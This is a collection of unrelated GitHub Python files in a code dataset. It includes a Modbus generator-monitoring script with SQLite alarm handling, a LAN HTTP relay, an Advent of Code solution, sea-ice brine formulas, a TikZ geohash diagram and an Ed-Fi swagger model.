\n salida[var_name] = round(((float(var_leidas.get(var_name)*0.1) - 32) * 0.5555555),2) # (32 °F − 32) × 5/9 = 0 °C\n \n if variable_entrada['tratamiento'] == 'Temperatura2': \n salida[var_name] = round(((float(var_leidas.get(var_name)) - 32) * 0.5555555),2) # (32 °F − 32) × 5/9 = 0 °C\n\n if variable_entrada['tratamiento'] == 'Knock': \n k_level = round(((var_leidas.get(var_name) * variable_entrada.get('multiplicador'))- 12.5) ,2)\n if k_level < 0: salida[var_name] = 0\n elif k_level > 100: salida[var_name] = 100\n else: salida[var_name] = k_level\n \n if variable_entrada['tratamiento'] == 'Escalado': \n salida[var_name] = round((var_leidas.get(var_name) * variable_entrada.get('multiplicador')),2)\n \n if variable_entrada['tratamiento'] == 'Complementario':\n salida['MWh'] = round ((float((var_leidas.get('MWh_a') * 65536) + var_leidas.get('MWh_b'))*0.001),4)\n salida['Horas_Motor'] = round (float((((var_leidas.get('Horas_a') * 65536) + var_leidas.get('Horas_b'))/3600)*0.1),2)\n\n if variable_entrada['tratamiento'] == 'Horas_GCP2':\n salida['Horas_Motor'] = round ((var_leidas.get('Horas_a') * 0.1) + (var_leidas.get('Horas_b')*1000),2)\n \n \n salida['V_Avg_N'] = round ((var_leidas.get('V_L1_N') + var_leidas.get('V_L2_N') + var_leidas.get('V_L3_N'))/3) # Agregado V_Avg_N solo en GCP2 \n \n \n return salida\n \n def limitar_max_min(self, dict_in):\n salida={}\n try:\n \n for out_var in self.out_vars:\n var_name = out_var['var_name']\n minimo = out_var['minimo']\n maximo = out_var['maximo']\n valor = dict_in.get(var_name)\n \n if minimo != 'NC' or maximo != 'NC':\n if type(valor) == int:\n if valor < minimo: valor = int(minimo)\n if valor > maximo: valor = int(maximo)\n if type(valor) == float:\n if valor < minimo: valor = float(minimo)\n if valor > maximo: valor = float(maximo)\n 
salida[var_name] = valor\n except Exception as e:\n logger.error('Modulo: \"limitar_min_max() - ', e) \n return salida \n \n def load_mode(self):\n mode_query = f\"SELECT mode FROM equipos_modbus_mode WHERE engine_model = '{self.engine_model}' AND control = '{self.control}'\"\n mode = ast.literal_eval(read_from_db(DB, mode_query)[0].get('mode'))\n ###############################################################################\n #### Para el futuro:\n #### Verificar que todas las input var esten dentro del MODE. #################\n ###############################################################################\n return mode\n \n def send_to_db (self, read_data):\n try:\n conn= sqlite3.connect(DB)\n cur = conn.cursor()\n \n for key, value in read_data.items():\n sql_update_query = f\"\"\"UPDATE 'equipos_interno' SET valor_output = ? WHERE internal_name = '{self.internal_name}' AND var_name = ?\"\"\"\n data = (value, key)\n cur.execute(sql_update_query, data)\n \n except Exception as e:\n logger.error('Modulo: \"send_to_db - \"', e)\n\n finally:\n conn.commit()\n conn.close() \n\nclass buffer():\n def __init__(self, device):\n self.internal_name = device['internal_name']\n \n \"\"\"Carga token desde DB\"\"\"\n buffer_query = f\"SELECT token FROM equipos_equipo WHERE internal_name = '{self.internal_name}'\"\n lectura_db = read_from_db(DB,buffer_query)[0]\n self.token = lectura_db.get('token')\n HEADER = {\n 'Content-Type': 'application/json',\n 'x-filename': self.internal_name + '_buffer.json',\n 'Authorization': self.token}\n\n URL = 'https://online.wonderware.com/apis/upload/datasource' \n \n while True:\n pila_buffer = q_persistente(path=f'./buffer/{self.internal_name}',multithreading=True)\n if pila_buffer.qsize() > 0:\n string_pila = pila_buffer.get()\n try:\n json_pila = json.dumps(string_pila,indent=4)\n data = '{\"data\": '+ json_pila + ' }'\n #Request de envio a Aveva; \n request_response = requests.request(\"POST\", url=URL, headers=HEADER, data=data, timeout=3)\n if request_response:\n logger.info(f'{self.internal_name} - Enviando Buffer de datos temporales guardados: ... {str(request_response.status_code)}')\n except Exception as ex:\n test_internet=chk_internet_socket()\n test_aveva = chk_internet_socket(host= URL, url_or_ip='url')\n update_global_status_values(internet = test_internet, aveva=test_aveva)\n logger.error(f\"Class buffer() -- {self.internal_name} - Error de Timeout o conexión con servidor en envio de Buffer. 
Se reintentara...\\n{ex}\")\n pila_buffer.put(string_pila)\n pila_buffer.task_done() \n time.sleep(10)\n\nclass leer_alarmas():\n def __init__(self, dicc_leido, internal_name, control):\n #control=\"GCP2\" # solo test GCP2\n try:\n if control==\"PCC3300\":\n detalle_alarmas = self.leer_alarmas_PCC3300(dicc_leido = dicc_leido, internal_name = internal_name) \n else:\n detalle_alarmas = self.leer_alarmas_GCP2(dicc_leido = dicc_leido, internal_name = internal_name)\n\n self.insertar_en_db(detalle_alarmas = detalle_alarmas, internal_name = internal_name) \n\n except Exception as e:\n logger.error('Modulo: \"leer_alarmas.__init__\" - ', e) \n\n def leer_alarmas_PCC3300(self, dicc_leido, internal_name):\n try:\n rango=[400,471]\n detalle_alarmas=self.leer_alarmas_bits(dicc_leido = dicc_leido, internal_name = internal_name, rango = rango, control= \"PCC3300\")\n return detalle_alarmas\n except Exception as e:\n logger.error('Modulo: \"leer_alarmas_PCC3300\" - ', e)\n\n def leer_alarmas_GCP2(self, dicc_leido, internal_name ):\n try: \n rango_bits_1 = [568,570]\n rango_bits_2 = [584,587]\n rango_words = [572,575]\n detalle_alarmas=[]\n detalle_alarmas=self.leer_alarmas_bits(dicc_leido = dicc_leido, internal_name = internal_name, rango = rango_bits_1, control= \"GCP2\")\n detalle_alarmas.extend(self.leer_alarmas_bits(dicc_leido = dicc_leido, internal_name = internal_name, rango = rango_bits_2, control= \"GCP2\"))\n detalle_alarmas.extend(self.leer_alarmas_words(dicc_leido = dicc_leido, internal_name = internal_name, rango = rango_words, control = \"GCP2\"))\n return detalle_alarmas\n except Exception as e:\n logger.error('Modulo: \"leer_alarmas_GCP2\" - ', e)\n\n def leer_alarmas_bits(self, dicc_leido, internal_name, rango, control):\n try:\n inicio_grupo,fin_grupo = rango\n alarmas_leidas={}\n for key in range(inicio_grupo,fin_grupo):\n alarmas_leidas[key]=dicc_leido[key]\n alarmas_activas={}\n for key, valor in alarmas_leidas.items():\n if valor > 0:\n lista_bits = [int(d) for d in str(bin(valor))[2:]] # convercion binario en lista.\n alarmas_activas[key]=lista_bits # direccion (ej.: {40400,12}) \n lista_bits=[]\n self.detalle_alarmas_bits=[]\n for key,lista_de_bits in alarmas_activas.items():\n bit=len(lista_de_bits)-1\n parametros=None\n for bit_en_lista in lista_de_bits:\n parametros=key,bit\n if bit_en_lista==1: \n self.detalle_alarmas_bits.extend(self.seleccion_lista_alarmas(parametros=parametros, tipo = \"bits\", control= control))\n bit=bit-1 \n except Exception as e:\n logger.error('Modulo: \"leer_alarmas_bits\" - ', e)\n\n return self.detalle_alarmas_bits\n\n def leer_alarmas_words(self, dicc_leido, internal_name, control, rango):\n try:\n inicio_grupo,fin_grupo = rango\n alarmas_leidas={}\n detalle_alarmas_words=[]\n for key in range(inicio_grupo,fin_grupo):\n alarmas_leidas[key]=dicc_leido[key]\n if alarmas_leidas[key] > 0: \n parametros=key,alarmas_leidas[key]\n detalle_alarmas_words.extend(self.seleccion_lista_alarmas(parametros=parametros, tipo = \"words\", control = \"GCP2\"))\n except Exception as e:\n logger.error('Modulo: \"leer_alarmas_words\" - ', e)\n\n return detalle_alarmas_words \n\n def seleccion_lista_alarmas(self, parametros, tipo, control):#engine_model, control): #Selecciona tipo de configuracion segun tipo de control\n try:\n conn=sqlite3.connect('./db.sqlite3')\n cursor=conn.cursor()\n if tipo == \"bits\":\n address,bit=parametros\n if control == \"PCC3300\":\n sql_select_query= f'SELECT code, name, response FROM alarmas3300 WHERE address={address} and bit={bit}'\n 
else:\n sql_select_query= f'SELECT code, name, response FROM alarmas_gcp_bits WHERE address={address} and bit={bit}'\n\n if tipo == \"words\":\n address, word= parametros\n sql_select_query= f'SELECT code, name, response FROM alarmas_gcp_palabras WHERE address={address} and word={word}'\n \n cursor.execute(sql_select_query)\n datos= cursor.fetchall()\n return datos \n except Exception as e:\n logger.error('Modulo: \"seleccion_lista_alarmas\" - ', e)\n finally:\n conn.commit()\n conn.close()\n\n def insertar_en_db(self, detalle_alarmas, internal_name):\n try:\n \n conn=sqlite3.connect(DB)\n cursor=conn.cursor()\n data=detalle_alarmas\n \n fecha = datetime.datetime.utcnow().strftime(('%d-%m-%Y'))\n hora = datetime.datetime.utcnow().time().isoformat(timespec='seconds')\n \n for alarma in data:\n code=alarma[0] \n verificacion_code_query=f\"\"\"SELECT EXISTS(SELECT 1 FROM equipos_alarma WHERE code={code} AND internal_name='{internal_name}')\"\"\"\n cursor.execute(verificacion_code_query) \n existe_code=cursor.fetchall()[0][0]\n \n\n if existe_code==0: # Si no existe la alarma la agrega al listado\n list_alarma=list(alarma)\n list_alarma.extend([internal_name,fecha,hora,1,0,0])\n alarma=tuple(list_alarma)\n query=\"INSERT INTO equipos_alarma (code,name,response,internal_name,fecha,hora,activa,aceptada,a_eliminar) VALUES(?,?,?,?,?,?,?,?,?)\"\n cursor.execute(query,alarma)\n else:\n aceptada_query=f\"\"\"SELECT aceptada FROM equipos_alarma WHERE code={code} AND internal_name='{internal_name}'\"\"\"\n cursor.execute(aceptada_query)\n esta_aceptada = cursor.fetchall()[0][0]\n if esta_aceptada == 1:\n query=f'UPDATE equipos_alarma SET activa=1'\n else:\n query=f'UPDATE equipos_alarma SET fecha=\"{fecha}\", hora=\"{hora}\", activa=1 WHERE code={code} AND internal_name=\"{internal_name}\"'\n cursor.execute(query)\n\n except Exception as e:\n logger.error('Modulo: \"insertar_en_db\" - ', e)\n\n finally:\n conn.commit()\n conn.close()\n \ndef main(): \n try:\n update_global_status_values(False,False)\n \n #Carga conf. 
inicial y prepara DB\n initial_config = load_initial_configuration() \n logger.info('Carga de configuración inicial....')\n set_DB(initial_configuration=initial_config)\n \n with futures.ThreadPoolExecutor() as main_executor:\n future_internet_test = main_executor.submit(internet_test)\n future_buffer = main_executor.map(buffer,initial_config)\n future_lectura = main_executor.map(lectura_equipo,initial_config)\n \n \n except Exception as e: \n logger.error('Main --- ', e)\n\nif __name__=='__main__':\n main()\n ","repo_name":"hadellacella/siempre2","sub_path":"AUX_INFO/siempre_viejo_para_test.py","file_name":"siempre_viejo_para_test.py","file_ext":"py","file_size_in_byte":32261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1506657819","text":"### SETTINGS ###\nredirect_to:str = \"10.0.0.214\"\n################\n\n\nimport socket\nimport json\nimport requests\n\n\nclass request:\n\n method:str = None\n path:str = None\n body:str = None\n headers:dict = {}\n\n @staticmethod\n def parse(full_request:str):\n ToReturn = request()\n \n # split\n parts = full_request.split(\"\\r\\n\")\n\n # get the method\n p1 = parts[0]\n loc1 = p1.index(\" \")\n tr = p1[0:loc1]\n ToReturn.method = tr\n\n # path\n p1 = parts[0]\n loc1 = p1.index(\" \")\n loc2 = p1.index(\" \", loc1 + 1)\n tr = p1[loc1+1:loc2]\n ToReturn.path = tr\n\n # body\n bs = full_request.split(\"\\r\\n\\r\\n\")\n ToReturn.body = bs[1]\n\n # headers dictionary\n #get part before body\n before_body = bs[0]\n bb_parts = before_body.split(\"\\r\\n\")\n for x in range(1, len(bb_parts)):\n this_header = bb_parts[x]\n cl = this_header.index(\":\")\n k = this_header[0:cl]\n v = this_header[cl+1:9999].strip()\n ToReturn.headers[k] = v\n\n return ToReturn\n \n\n\n# print my IP address\nhostname = socket.gethostname()\nip_address = socket.gethostbyname(hostname)\nprint(\"My local IP address: '\" + ip_address + \"'\")\nprint(\"I will redirect all network traffic to '\" + redirect_to + \"'\")\n\n# Create a socket object\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# Bind the socket to a specific address and port\ns.bind((\"\", 80))\n\n# Listen for incoming connections\ns.listen(1)\n\nprint(\"Listening for incoming connections...\")\n\nwhile True:\n # Establish connection with client\n client, addr = s.accept()\n print(\"Connection from: \" + str(addr))\n \n # read\n r = client.recv(9999)\n req:request = request.parse(r.decode())\n\n\n\n # handle a get and post differently\n if req.method.upper() == \"POST\":\n\n # was a body included\n body:str = None\n if req.body != \"\":\n body = req.body\n else:\n\n # find the header that states the length\n body_length:int = None\n for key, value in req.headers.items():\n if key.lower() == \"content-length\":\n body_length = int(value)\n\n if body_length != None:\n bodyb = client.recv(body_length)\n body = bodyb.decode()\n\n jobj = json.loads(body)\n\n # redirect\n url = \"http://\" + redirect_to + req.path\n headers = {\"Content-Type\": \"application/json\"}\n print(\"Sending...\")\n response = requests.post(url, headers=headers, json=jobj)\n print(\"Complete!\")\n \n # Respond with what we heard back\n client.send((\"HTTP/1.0 \" + str(response.status_code) + \"\\r\\nContent-Type: application/json\\r\\n\\r\\n\" + response.content.decode()).encode())\n client.close()\n\n elif req.method.upper() == \"GET\":\n \n # redirect\n url = \"http://\" + redirect_to + req.path\n print(\"Sending...\")\n response = requests.get(url)\n 
print(\"Complete!\")\n\n # Respond with what we heard back\n client.send((\"HTTP/1.0 \" + str(response.status_code) + \"\\r\\nContent-Type: application/json\\r\\n\\r\\n\" + response.content.decode()).encode())\n client.close()","repo_name":"TimHanewich/mecanum-rover","sub_path":"src/interpreter.py","file_name":"interpreter.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23288211728","text":"import sys\n\nsys.path.append(\"..\")\nfrom utils.utils import IntComputer, Program\n\nmem = list(map(int, open('task_1_input.txt', 'r').readline().split(',')))\n# free game hack :D\nmem[0] = 2\n\nint_comp = IntComputer()\nint_comp.add_program(Program(mem, []))\n\n# ball pos\nb_x, b_y = 0, 0\n\n# paddle pos\np_x, p_y = 0, 0\n\nwhile int_comp.programs[0].status != 0:\n int_comp.run_prog()\n status = int_comp.programs[0].status\n\n # run until status is not 2 (output)\n if status == 2:\n continue\n\n # parse output\n output = int_comp.programs[0].outputs\n instructions = [output[i : i + 3] for i in range(0, len(output), 3)]\n\n # execute instructions\n for i in instructions:\n x, y, tile = i\n\n # display score\n if x == -1 and y == 0:\n print(f'Score: {tile}')\n continue\n\n # only track ball and paddle\n # blocks are irrelevant\n\n # set paddle pos\n if tile == 3:\n p_x, p_y = (x, y)\n\n if tile == 4:\n b_x, b_y = (x, y)\n\n # provide input\n if status == 1:\n if b_x != p_x:\n int_comp.programs[0].add_input((b_x - p_x) // abs(b_x - p_x))\n else:\n int_comp.programs[0].add_input(0)\n\n # reset output\n int_comp.programs[0].reset_output()\n","repo_name":"Korred/advent_of_code_2019","sub_path":"day_13/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7635330459","text":"# finding the length of the stack using recursion\n\n# if the stack becomes empty then we have to finish counting\n\n\ndef is_empty(stack):\n try:\n stack.pop()\n print(\"Not True\")\n except IndexError:\n return True\n\ncount = 1\ndef leng(stack):\n if is_empty(stack) == True:\n return\n\n else:\n global count\n count = count + 1\n stack.pop()\n return leng(stack) \n\n\nl = [10,20]\nleng(l)\nprint(count)\n\nl = [10,20,30]\nprint(type(l.pop()))\nprint(l)\nl.pop()\nprint(l)","repo_name":"raghavnarula/Data-Structures","sub_path":"Stacks Data Structures/lengthOfstack.py","file_name":"lengthOfstack.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9171167046","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCollection of subfunctions related to brine parameters: Brine salinity, \nbrine conductivity, brine volumen etc.\n\n@author: mwi\n\"\"\"\nimport numpy as np\n\ndef salinity(T,method='Assur'):\n \"\"\"\n Brine salinity as function of temperature.\n Empirical expression from Assur (1960) and Poe et al (1972).\n Version from Ulaby et al, 1986 (E63). Valid range: -43.2oC--1.8oC.\n \n [sal] = salinity(T,method)\n sal: Salinity [psu (or o/oo)]\n T: Temperature [K]\n method: 'Assur' (default), 'unknown'\n \"\"\"\n # Temperature in oC:\n Tc = T-273.15 \n \n # Salinity:\n sal = np.ones(len(Tc))\n \n if method == 'Assur':\n mask = (Tc>=-1.8) # Using Tc=-1.8oC (not 2oC) to ensure continuity of salinity to value of 34.2o/oo. 
\n sal[mask]=34.2 # Constant level above -1.8oC\n \n mask = (Tc<-1.8) & (Tc>=-8.2)\n sal[mask]=1.725-18.756*Tc[mask]-0.3964*Tc[mask]**2\n \n mask = (Tc<-8.2) & (Tc>=-22.9)\n sal[mask]=57.041-9.929*Tc[mask]-0.16204*Tc[mask]**2-0.002396*Tc[mask]**3\n \n mask = (Tc<-22.9) & (Tc>=-36.8)\n sal[mask]=242.94+1.5299*Tc[mask]+0.0429*Tc[mask]**2\n \n mask = (Tc<-36.8) & (Tc>=-43.2)\n sal[mask]=508.18+14.535*Tc[mask]+0.2018*Tc[mask]**2\n \n # Constant level for temperatures below -43.2oC:\n mask = (Tc<-43.2)\n sal[mask]=508.18+14.535*-43.2+0.2018*((-43.2)**2) \n \n elif method == 'unknown':\n sal[T>=0] = 0\n \n mask = (Tc<0) & (Tc>=-8)\n sal[mask]= 1./(0.001-0.05411/Tc[mask]) \n \n mask = (Tc<-8) & (Tc>=-22.9)\n sal[mask] = -1.20 - 21.8*Tc[mask] - 0.919*Tc[mask]**2 - 0.0178*Tc[mask]**3\n \n mask = (Tc<-22.9) & (Tc>=-36.8)\n sal[mask]=242.94+1.5299*Tc[mask]+0.0429*Tc[mask]**2\n \n mask = (Tc<-36.8) & (Tc>=-43.2)\n sal[mask]=508.18+14.535*Tc[mask]+0.2018*Tc[mask]**2\n \n # Constant level for temperatures below -43.2oC:\n mask = (Tc<-43.2)\n sal[mask]=508.18+14.535*-43.2+0.2018*((-43.2)**2) \n return sal\n\ndef normality(sal):\n \"\"\"\n Normality of brine solution. \n \n [N] = normality(sal)\n N: Normality [unit?]\n sal: Salinity [psu]\n \"\"\"\n \n # Normality of brine solution:\n N = 0.9141*sal* (1.707e-2 + 1.205e-5*sal + 4.058e-9*sal**2)\n return N \n \ndef conductivity(T,sal,method='StogrynDesargant1985'):\n \"\"\"\n Ionic conductivity of brine as function of brine temperature and salinity. \n Version from Ulaby et al, 1986 (E20). Valid range: -43.2oC--1.8oC.\n Note that this version is somewhat different from what is given by Stogryn \n and Desargant, 1985, which is calculated based on temperature only. \n \n [cond, N] = conductivity(T,N)\n cond: Brine conductivity [in S/m?]\n N: Normality\n T: Temperature [K]\n sal: Salinity [psu]\n method: 'Stogryn1971', 'StogrynDesargant1985' (default)\n \"\"\" \n # Temperature in oC:\n Tc = T-273.15\n \n if method == 'Stogryn1971':\n # Normality of brine solution:\n N = normality(sal)\n \n # Conductivity:\n D = 25-Tc\n sig = N* (10.39-2.378*N+0.683*(N**2)-0.135*N**3+1.01e-2*N**4)\n c = 1.0 - 1.96e-2*D + 8.08e-5*(D**2) - N*D*(3.02e-5+3.92e-5*D + N*(1.72e-5 - 6.58e-6*D))\n cond=c*sig\n \n elif method == 'StogrynDesargant1985':\n # Alternative solution from Stogryn and Desargant, 1985, Eq.7:\n cond=np.zeros(len(Tc))\n mask = (Tc>=-22.9)\n cond[mask] = -Tc[mask]*np.exp(0.5193 + 0.8755*0.1*Tc[mask])\n cond[~mask] = -Tc[~mask]*np.exp(1.0334 + 0.1100*Tc[~mask])\n \n # Calculated normality is not required:\n N = None\n \n # Always positive:\n cond = np.clip(cond,0,None) \n return cond, N\n\ndef volume(T,sal,method='Frankenstein'):\n \"\"\"\n Volumen fraction of brine in sea ice.\n volbrine = volume(T,sal)\n volbrine: Volumen fraction of brine\n T: Temperature [K]\n sal: Sea ice salinity [o/oo, or psu, or ppt] \n method: 'Frankenstein' (default), 'Frankenstein_simple', 'original'\n \"\"\" \n # Temperature in oC:\n Tc = T-273.15\n\n # From Ulaby et al, 1986, E71, and Ulaby p. 
136, E4.51\n # Empirical expression from Frankenstein and Garner (1967): \n # Applicable for the temperature range: -22.9oC- -0.5oC \n if method == 'Frankenstein_simple':\n volbrine = np.zeros(len(Tc))\n mask = (Tc<-0.1)\n volbrine[mask] = 0.001*sal[mask]*((-49.185/Tc[mask])+0.532) \n\n # Frankenstein equation cannot be calculated for Tc=0oC.\n # Using a different relationship for temperatures above -0.1oC:\n volbrine[~mask] = 0.001*sal[~mask]*9.717 # Not sure where this one comes from\n \n if method == 'Frankenstein':\n # Equations taken from Ulaby's old book, p. 2048:\n volbrine = np.zeros(len(Tc))\n mask = (Tc>-0.5)\n volbrine[mask] = 0.001*sal[mask]*9.717 # Not sure where this one comes from\n mask = (Tc<=-0.5) & (Tc>-2.06)\n volbrine[mask] = 0.001*sal[mask]*(-52.56/Tc[mask]-2.28)\n mask = (Tc<=-2.06) & (Tc>-8.2)\n volbrine[mask] = 0.001*sal[mask]*(-45.917/Tc[mask]+0.93)\n mask = (Tc<=-8.2) & (Tc>=-22.9)\n volbrine[mask] = 0.001*sal[mask]*(-43.795/Tc[mask]+1.189)\n mask = (Tc<-22.9)\n volbrine[mask] = 0.001*sal[mask]*(-43.795/(-22.9)+1.189)\n \n elif method == 'original':\n sal_brine = salinity(T)\n volbrine = sal/sal_brine #*rho_ice/rho_brine \n # rho_brine is also temperature dependent, but much weaker than sal_brine. \n # Calculated values may be some factor off the true values??\n \n volbrine = np.clip(volbrine,0,1)\n return volbrine","repo_name":"PKUliubaojian/TDS_model","sub_path":"Python/brine.py","file_name":"brine.py","file_ext":"py","file_size_in_byte":5841,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"15851663765","text":"from fathom import Point, ORIGIN\nfrom fathom.tikz import Canvas\nfrom fathom.geometry import *\nimport fathom.layout as layout\nimport fathom.tikz.colors as colors\nimport fathom.tikz.line_styles as line_styles\nimport fathom.tikz.locations as locations\nfrom itertools import *\n\ndef upside_down(p):\n return Point(p.x, -p.y)\n\ndef drop(xs, n):\n for _ in range(n):\n next(xs)\n for x in xs:\n yield x\n\ndef fraction(canvas, center, value, text_color):\n SEG_NUM = 3\n SEG_W = 0.2\n SEG_H = 0.4\n\n ts = repeat((value, 1, 0))\n ts = accumulate(\n ts,\n lambda x, _:\n (x[0], x[1] / 2, 0) if x[0] < x[1] else \\\n (x[0] - x[1], x[1] / 2, 1))\n ts = drop(ts, 2)\n ts = ('{}'.format(x) for _, _, x in ts)\n\n rs = repeat(center + Point(-SEG_W * (SEG_NUM - 1) / 2, 0))\n rs = accumulate(rs, lambda x, _: x + Point(SEG_W, 0))\n rs = (Rectangle(center=x, width=SEG_W, height=SEG_H) for x in rs)\n rs = islice(rs, SEG_NUM)\n rs = list(rs)\n\n canvas.new_text(\n anchor=centroid([rs[0].vertices()[0],\n rs[0].vertices()[3]]),\n text='0.',\n location=locations.WEST)\n\n res = list(zip(rs, ts))\n for r, t in res:\n canvas.new_text(\n anchor=r.center(),\n text=t,\n pen_color=text_color)\n\n canvas.new_rectangle(\n vertices=[rs[0].vertices()[0],\n rs[-1].vertices()[1],\n rs[-1].vertices()[2],\n rs[0].vertices()[3]])\n for x in rs[1:]:\n canvas.new_line(src=x.vertices()[0], dst=x.vertices()[3])\n\n return res\n\ndef draw_root(canvas, center, left, right):\n SEG_W = 0.2\n SEG_H = 0.4\n n = len(left) + len(right)\n segs = repeat(center + Point(-SEG_W * (n - 1) / 2, 0))\n segs = accumulate(segs, lambda x, _: x + Point(SEG_W, 0))\n segs = (Rectangle(\n center=x,\n width=SEG_W,\n height=SEG_H) \\\n for x in segs)\n segs = list(islice(segs, n))\n\n src = chain(\n ((i * 2, colors.BLUE, x) for i, x in enumerate(left)),\n ((i * 2 + 1, colors.ORANGE, x) for i, x in enumerate(right)))\n for i, c, (r, t) in src:\n d = segs[i]\n 
canvas.new_text(anchor=d.center(), text=t, pen_color=c)\n canvas.new_arrow(\n src=centroid([r.vertices()[2], r.vertices()[3]]),\n dst=centroid([d.vertices()[0], d.vertices()[1]]))\n\n canvas.new_rectangle(\n vertices=[segs[0].vertices()[0],\n segs[-1].vertices()[1],\n segs[-1].vertices()[2],\n segs[0].vertices()[3]])\n for x in segs[1:]:\n canvas.new_line(\n src=x.vertices()[0],\n dst=x.vertices()[3])\n\nif __name__ == '__main__':\n tree = layout.tree(\n ['root',\n ['left', ['left_up']],\n ['right', ['right_up']]],\n root=ORIGIN,\n h_sep=2,\n v_sep=1.3)\n for k, v in tree.copy().items():\n tree[k] = upside_down(v)\n\n canvas = Canvas(\n preamble=['\\\\usepackage{amsmath}'],\n leading_instructions=['\\\\footnotesize'])\n\n canvas.new_text(anchor=tree['left_up'], text='$121^\\\\circ$E')\n left_up = canvas.new_rectangle(\n center=tree['left_up'],\n width=1,\n height=0.4,\n pen_color=colors.INVISIBLE)\n left = fraction(canvas, tree['left'], (180 + 121) / 360, colors.BLUE)\n canvas.new_arrow(\n src=left_up,\n dst=centroid([left[1][0].vertices()[0], left[1][0].vertices()[1]]))\n\n canvas.new_text(anchor=tree['right_up'], text='$31^\\\\circ$N')\n right_up = canvas.new_rectangle(\n center=tree['right_up'],\n width=1,\n height=0.4,\n pen_color=colors.INVISIBLE)\n right = fraction(canvas, tree['right'], (31 + 90) / 180, colors.ORANGE)\n canvas.new_arrow(\n src=right_up,\n dst=centroid([right[1][0].vertices()[0], right[1][0].vertices()[1]]))\n\n draw_root(canvas, tree['root'], left, right)\n\n print(canvas.draw())\n","repo_name":"TimeExceed/modern_db_part0","sub_path":"figs/geohash.py","file_name":"geohash.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"7808986018","text":"# coding: utf-8\n\n\"\"\"\n Ed-Fi Operational Data Store API\n\n The Ed-Fi ODS / API enables applications to read and write education data stored in an Ed-Fi ODS through a secure REST interface. *** > *Note: Consumers of ODS / API information should sanitize all data for display and storage. 
The ODS / API provides reasonable safeguards against cross-site scripting attacks and other malicious content, but the platform does not and cannot guarantee that the data it contains is free of all potentially harmful content.* *** # noqa: E501\n\n OpenAPI spec version: 3\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom swagger_client.configuration import Configuration\n\n\nclass EdFiAcademicWeek(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'id': 'str',\n 'week_identifier': 'str',\n 'school_reference': 'EdFiSchoolReference',\n 'begin_date': 'date',\n 'end_date': 'date',\n 'total_instructional_days': 'int',\n 'etag': 'str'\n }\n\n attribute_map = {\n 'id': 'id',\n 'week_identifier': 'weekIdentifier',\n 'school_reference': 'schoolReference',\n 'begin_date': 'beginDate',\n 'end_date': 'endDate',\n 'total_instructional_days': 'totalInstructionalDays',\n 'etag': '_etag'\n }\n\n def __init__(self, id=None, week_identifier=None, school_reference=None, begin_date=None, end_date=None, total_instructional_days=None, etag=None, _configuration=None): # noqa: E501\n \"\"\"EdFiAcademicWeek - a model defined in Swagger\"\"\" # noqa: E501\n if _configuration is None:\n _configuration = Configuration()\n self._configuration = _configuration\n\n self._id = None\n self._week_identifier = None\n self._school_reference = None\n self._begin_date = None\n self._end_date = None\n self._total_instructional_days = None\n self._etag = None\n self.discriminator = None\n\n if id is not None:\n self.id = id\n self.week_identifier = week_identifier\n self.school_reference = school_reference\n self.begin_date = begin_date\n self.end_date = end_date\n self.total_instructional_days = total_instructional_days\n if etag is not None:\n self.etag = etag\n\n @property\n def id(self):\n \"\"\"Gets the id of this EdFiAcademicWeek. # noqa: E501\n\n # noqa: E501\n\n :return: The id of this EdFiAcademicWeek. # noqa: E501\n :rtype: str\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"Sets the id of this EdFiAcademicWeek.\n\n # noqa: E501\n\n :param id: The id of this EdFiAcademicWeek. # noqa: E501\n :type: str\n \"\"\"\n\n self._id = id\n\n @property\n def week_identifier(self):\n \"\"\"Gets the week_identifier of this EdFiAcademicWeek. # noqa: E501\n\n The school label for the week. # noqa: E501\n\n :return: The week_identifier of this EdFiAcademicWeek. # noqa: E501\n :rtype: str\n \"\"\"\n return self._week_identifier\n\n @week_identifier.setter\n def week_identifier(self, week_identifier):\n \"\"\"Sets the week_identifier of this EdFiAcademicWeek.\n\n The school label for the week. # noqa: E501\n\n :param week_identifier: The week_identifier of this EdFiAcademicWeek. 
# noqa: E501\n :type: str\n \"\"\"\n if self._configuration.client_side_validation and week_identifier is None:\n raise ValueError(\"Invalid value for `week_identifier`, must not be `None`\") # noqa: E501\n if (self._configuration.client_side_validation and\n week_identifier is not None and len(week_identifier) > 80):\n raise ValueError(\"Invalid value for `week_identifier`, length must be less than or equal to `80`\") # noqa: E501\n\n self._week_identifier = week_identifier\n\n @property\n def school_reference(self):\n \"\"\"Gets the school_reference of this EdFiAcademicWeek. # noqa: E501\n\n\n :return: The school_reference of this EdFiAcademicWeek. # noqa: E501\n :rtype: EdFiSchoolReference\n \"\"\"\n return self._school_reference\n\n @school_reference.setter\n def school_reference(self, school_reference):\n \"\"\"Sets the school_reference of this EdFiAcademicWeek.\n\n\n :param school_reference: The school_reference of this EdFiAcademicWeek. # noqa: E501\n :type: EdFiSchoolReference\n \"\"\"\n if self._configuration.client_side_validation and school_reference is None:\n raise ValueError(\"Invalid value for `school_reference`, must not be `None`\") # noqa: E501\n\n self._school_reference = school_reference\n\n @property\n def begin_date(self):\n \"\"\"Gets the begin_date of this EdFiAcademicWeek. # noqa: E501\n\n The start date for the academic week. # noqa: E501\n\n :return: The begin_date of this EdFiAcademicWeek. # 